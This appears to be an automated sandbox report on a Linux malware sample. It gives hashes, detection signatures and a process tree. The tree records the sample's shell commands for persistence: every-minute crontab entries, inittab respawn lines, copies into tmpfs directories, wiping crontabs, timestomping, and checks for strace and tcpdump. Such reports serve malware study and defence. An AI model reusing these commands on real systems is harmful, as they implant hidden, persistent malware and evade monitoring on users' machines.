Analysis
-
max time kernel
0s -
max time network
102s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
submitted
14-03-2022 02:35
Static task
static1
Behavioral task
behavioral1
Sample
582a434ba0f2e04bd8b5495c50320068
Resource
ubuntu1804-amd64-en-20211208
0 signatures
0 seconds
General
-
Target
582a434ba0f2e04bd8b5495c50320068
-
Size
98KB
-
MD5
582a434ba0f2e04bd8b5495c50320068
-
SHA1
b3888d650646aa63423765e686a14ddc82ee52be
-
SHA256
7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
-
SHA512
5d4075888d1414f57edd832c6fb7151103af441eafebfdeb97be077bcfa504429f792c1fb23f18674aaf94ba1c6fa8d42e7c73a0d7f2d845f7d9faa605ac6fe4
Score
9/10
Malware Config
Signatures
-
Writes file to system bin folder 1 TTPs 3 IoCs
Processes:
description ioc /bin/crontab /bin/crontab /bin/nvram /bin/nvram /bin/uname /bin/uname -
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
Processes:
582a434ba0f2e04bd8b5495c50320068description ioc process /etc/rc.local /etc/rc.local 582a434ba0f2e04bd8b5495c50320068 -
Write file to user bin folder 1 TTPs 2 IoCs
Processes:
description ioc /usr/bin/crontab /usr/bin/crontab /usr/sbin/nvram /usr/sbin/nvram -
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem.
Processes:
cpcpcpcpdescription ioc process /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems cp -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
cpcpcpcp582a434ba0f2e04bd8b5495c50320068description ioc process /tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 cp /tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 cp /tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 cp /tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 cp /tmp/.bawtz /tmp/.bawtz 582a434ba0f2e04bd8b5495c50320068
Processes
-
./582a434ba0f2e04bd8b5495c50320068./582a434ba0f2e04bd8b5495c503200681⤵
- Modifies rc script
- Writes file to tmp directory
PID:593
-
/bin/shsh -c "pidof -x strace > /dev/null"1⤵PID:594
-
/bin/pidofpidof -x strace2⤵PID:595
-
/bin/shsh -c "pidof -x tcpdump > /dev/null"1⤵PID:596
-
/bin/pidofpidof -x tcpdump2⤵PID:597
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:600
-
/bin/catcat /etc/inittab2⤵PID:602
-
/bin/grepgrep -v /tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:604
-
/bin/shsh -c "crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:601
-
/usr/bin/crontabcrontab -l2⤵PID:605
-
/bin/grepgrep /tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:607
-
/bin/grepgrep -v "no cron"2⤵PID:608
-
/usr/bin/crontabcrontab -2⤵PID:612
-
/bin/shsh -c "crontab -r"1⤵PID:603
-
/usr/bin/crontabcrontab -r2⤵PID:606
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:609
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:610
-
/bin/catcat /etc/inittab22⤵PID:613
-
/usr/bin/crontabcrontab -l1⤵PID:614
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:615
-
/bin/rmrm -rf /etc/inittab22⤵PID:616
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:617
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:618
-
/bin/shsh -c "/bin/uname -n"1⤵PID:621
-
/bin/uname/bin/uname -n2⤵PID:623
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068"1⤵PID:622
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:624
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/dev/shm/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:626
-
/bin/catcat /etc/inittab2⤵PID:628
-
/bin/grepgrep -v /dev/shm/582a434ba0f2e04bd8b5495c503200682⤵PID:629
-
/bin/shsh -c "crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:627
-
/bin/grepgrep /dev/shm/582a434ba0f2e04bd8b5495c503200682⤵PID:631
-
/usr/bin/crontabcrontab -l2⤵PID:630
-
/bin/grepgrep -v "no cron"2⤵PID:636
-
/usr/bin/crontabcrontab -2⤵PID:640
-
/bin/shsh -c "echo \"0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:637
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:638
-
/bin/catcat /etc/inittab22⤵PID:641
-
/usr/bin/crontabcrontab -l1⤵PID:642
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:643
-
/bin/rmrm -rf /etc/inittab22⤵PID:644
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:645
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:646
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068"1⤵PID:647
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:648
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:650
-
/bin/catcat /etc/inittab2⤵PID:652
-
/bin/grepgrep -v /var/tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:653
-
/bin/shsh -c "crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:651
-
/usr/bin/crontabcrontab -l2⤵PID:654
-
/bin/grepgrep /var/tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:655
-
/bin/grepgrep -v "no cron"2⤵PID:656
-
/usr/bin/crontabcrontab -2⤵PID:660
-
/bin/shsh -c "echo \"0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:657
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:658
-
/bin/catcat /etc/inittab22⤵PID:662
-
/usr/bin/crontabcrontab -l1⤵PID:661
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:663
-
/bin/rmrm -rf /etc/inittab22⤵PID:664
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:665
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:666
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068"1⤵PID:667
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/lock/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:670
-
/bin/catcat /etc/inittab2⤵PID:672
-
/bin/grepgrep -v /var/lock/582a434ba0f2e04bd8b5495c503200682⤵PID:673
-
/bin/shsh -c "crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:671
-
/usr/bin/crontabcrontab -l2⤵PID:674
-
/bin/grepgrep /var/lock/582a434ba0f2e04bd8b5495c503200682⤵PID:675
-
/bin/grepgrep -v "no cron"2⤵PID:677
-
/usr/bin/crontabcrontab -2⤵PID:680
-
/bin/shsh -c "echo \"0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:676
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:678
-
/bin/catcat /etc/inittab22⤵PID:681
-
/usr/bin/crontabcrontab -l1⤵PID:682
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:683
-
/bin/rmrm -rf /etc/inittab22⤵PID:684
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:685
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:686
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068"1⤵PID:687
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/run/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:690
-
/bin/catcat /etc/inittab2⤵PID:692
-
/bin/grepgrep -v /var/run/582a434ba0f2e04bd8b5495c503200682⤵PID:694
-
/bin/shsh -c "crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:691
-
/usr/bin/crontabcrontab -l2⤵PID:693
-
/bin/grepgrep /var/run/582a434ba0f2e04bd8b5495c503200682⤵PID:695
-
/bin/grepgrep -v "no cron"2⤵PID:696
-
/usr/bin/crontabcrontab -2⤵PID:699
-
/bin/shsh -c "echo \"0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:697
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:700
-
/bin/catcat /etc/inittab22⤵PID:702
-
/usr/bin/crontabcrontab -l1⤵PID:701
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:703
-
/bin/rmrm -rf /etc/inittab22⤵PID:704
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:705
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:706